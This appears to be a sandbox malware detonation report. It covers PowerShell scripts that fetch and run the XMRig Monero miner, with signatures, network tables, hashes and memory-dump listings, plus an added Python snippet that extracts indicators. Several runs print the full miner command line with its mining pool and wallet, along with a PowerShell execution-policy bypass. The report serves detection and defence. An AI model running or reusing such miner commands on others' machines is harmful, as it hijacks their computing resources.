memory/1760-78-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-79-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
299s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(22 hits, none with a populated field)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1820 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1820 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/1820-0-0x00007FF995073000-0x00007FF995074000-memory.dmp
memory/1820-5-0x000001AB7EB50000-0x000001AB7EB72000-memory.dmp
memory/1820-8-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-9-0x000001AB7EEB0000-0x000001AB7EF26000-memory.dmp
memory/1820-10-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_koozvqxv.bdv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1820-25-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-29-0x00007FF995073000-0x00007FF995074000-memory.dmp
memory/1820-30-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-31-0x00007FF995070000-0x00007FF995A5C000-memory.dmp
memory/1820-51-0x000001AB7EBC0000-0x000001AB7EBD2000-memory.dmp
memory/1820-64-0x000001AB666E0000-0x000001AB666EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2484-93-0x0000023B10BC0000-0x0000023B10BE0000-memory.dmp
memory/2484-94-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-95-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-96-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-97-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-98-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-99-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-100-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-101-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-102-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-103-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-104-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-105-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-106-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-107-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-108-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-109-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-110-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-111-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-112-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-113-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-114-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-115-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
memory/2484-116-0x00007FF6F2CE0000-0x00007FF6F3913000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
299s
Max time network
273s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(28 hits, none with a populated field)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 900 wrote to memory of 820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 900 wrote to memory of 820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/900-2-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-1-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-0-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-3-0x0000028471790000-0x00000284717B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4dwj10b0.4hr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/900-13-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/900-15-0x0000028471A80000-0x0000028471A92000-memory.dmp
memory/900-16-0x00000284717D0000-0x00000284717DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/820-47-0x000002012AB20000-0x000002012AB40000-memory.dmp
memory/820-48-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-49-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-50-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-51-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/900-52-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-53-0x00007FFF84D70000-0x00007FFF84E9A000-memory.dmp
memory/820-54-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-55-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-56-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-57-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-58-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-59-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-60-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-61-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-62-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-63-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-64-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-65-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-66-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-67-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-68-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-69-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-70-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-71-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-72-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-73-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-74-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-75-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
memory/820-76-0x00007FF72DF70000-0x00007FF72EBA3000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
Network
Files
memory/2244-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp
memory/2244-5-0x000000001B330000-0x000000001B612000-memory.dmp
memory/2244-6-0x0000000002390000-0x0000000002398000-memory.dmp
memory/2244-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-12-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
296s
Max time network
286s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1656 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1656 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.22:443 | | tcp |
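Most rows in these Network tables are sandbox noise rather than indicators: 8.8.8.8 is the detonation VM's resolver, the in-addr.arpa rows are reverse lookups of peers the VM already spoke to, and github.com / objects.githubusercontent.com are shared infrastructure (the run downloads the xmrig-6.21.3 archive from there, which fits the dropped path, but that is not blockable). The pair worth acting on is rx.unmineable.com and 161.35.34.195:443, and a bare IP with no Domain cell, as in the last row above, needs review before it goes on a blocklist. The Python below is an added example and not part of the report or of any tool it names: it parses the behavioral28 table as printed (with the last row's Domain cell empty) and separates actionable indicators from noise. The RESOLVERS and SHARED_INFRA sets and the firewall log lines are constructed assumptions.

```python
"""Parse a sandbox Network table and separate actionable indicators from sandbox noise."""
import re

# Copied from the behavioral28 Network section of this report; the last row has no Domain.
NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.22:443 | | tcp |
"""
# Assumptions: the sandbox's resolver, and domains that show up in nearly every detonation.
RESOLVERS = {"8.8.8.8"}
SHARED_INFRA = {"github.com", "objects.githubusercontent.com", "g.bing.com", "www.bing.com"}


def parse_network_table(text):
    """Turn the pipe-delimited table into dicts, splitting Destination into ip and port."""
    lines = [ln for ln in text.splitlines() if ln.startswith("|")]
    header = [c.strip() for c in lines[0].strip("|").split("|")]
    rows = []
    for ln in lines[1:]:
        cells = [c.strip() for c in ln.strip("|").split("|")]
        if len(cells) == len(header) - 1:            # row printed without its Domain cell
            cells.insert(header.index("Domain"), "")
        row = dict(zip(header, cells))
        ip, _, port = row["Destination"].rpartition(":")
        row["ip"], row["port"] = ip, int(port)
        rows.append(row)
    return rows


def classify(row):
    """One of: reverse-lookup, dns-query, unresolved, shared-infra, attacker-infra."""
    if row["Domain"].endswith(".in-addr.arpa"):
        return "reverse-lookup"                      # the VM resolving peers it already spoke to
    if row["ip"] in RESOLVERS and row["port"] == 53:
        return "dns-query"                           # resolver IP is noise; queried name may matter
    if not row["Domain"]:
        return "unresolved"                          # bare IP, needs manual review before blocking
    if row["Domain"] in SHARED_INFRA:
        return "shared-infra"
    return "attacker-infra"


def extract_iocs(text):
    """Collect names and ip:port pairs worth blocking or hunting, keeping the rest separate."""
    iocs = {"domains": set(), "sockets": set(), "shared_https": set(), "review": set()}
    for row in parse_network_table(text):
        kind = classify(row)
        if kind == "dns-query" and row["Domain"] not in SHARED_INFRA:
            iocs["domains"].add(row["Domain"])
        elif kind == "attacker-infra":
            iocs["domains"].add(row["Domain"])
            iocs["sockets"].add(f"{row['ip']}:{row['port']}")
        elif kind == "shared-infra" and row["port"] == 443:
            iocs["shared_https"].add(row["Domain"])
        elif kind == "unresolved":
            iocs["review"].add(f"{row['ip']}:{row['port']}")
    return iocs


# Constructed firewall log lines (not from the report): "<ts> <src:port> -> <dst:port> <proto>".
SAMPLE_CONN_LOG = [
    "2024-05-22T20:14:01Z 10.0.0.5:49811 -> 20.26.156.215:443 tcp",
    "2024-05-22T20:14:09Z 10.0.0.5:49830 -> 161.35.34.195:443 tcp",
    "2024-05-22T20:14:40Z 10.0.0.7:51002 -> 161.35.34.195:443 tcp",
    "2024-05-22T20:15:12Z 10.0.0.5:49901 -> 23.62.61.56:443 tcp",
]


def hunt(iocs, conn_lines):
    """Return (source ip, destination socket) for each connection to an attacker-infra socket."""
    hits = []
    for line in conn_lines:
        m = re.search(r"->\s+(\S+)", line)
        if m and m.group(1) in iocs["sockets"]:
            hits.append((line.split()[1].rsplit(":", 1)[0], m.group(1)))
    return hits


if __name__ == "__main__":
    found = extract_iocs(NETWORK_TABLE)
    print(found)
    print(hunt(found, SAMPLE_CONN_LOG))
```

The pool talks stratum over TCP 443, so it blends in with HTTPS at the port level; the IP behind rx.unmineable.com can also change, so the domain (in DNS logs or TLS SNI) is the durable indicator and the ip:port pair is only good for hunting around the detonation date.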
Files
memory/1656-0-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvtuswkd.0u3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1656-9-0x00000232C95B0000-0x00000232C95D2000-memory.dmp
memory/1656-10-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-11-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-12-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-13-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-14-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-15-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-17-0x00000232C9620000-0x00000232C9632000-memory.dmp
memory/1656-18-0x00000232C9600000-0x00000232C960A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4556-49-0x0000027D8A8E0000-0x0000027D8A900000-memory.dmp
memory/4556-50-0x0000027D8A930000-0x0000027D8A950000-memory.dmp
memory/4556-51-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-54-0x0000027D8C230000-0x0000027D8C250000-memory.dmp
memory/4556-53-0x0000027D8C210000-0x0000027D8C230000-memory.dmp
memory/4556-52-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-55-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-56-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-58-0x0000027D8C230000-0x0000027D8C250000-memory.dmp
memory/4556-57-0x0000027D8C210000-0x0000027D8C230000-memory.dmp
memory/4556-59-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-60-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-61-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-62-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-63-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-64-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-65-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-66-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-67-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-68-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-69-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-70-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-71-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-72-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-73-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
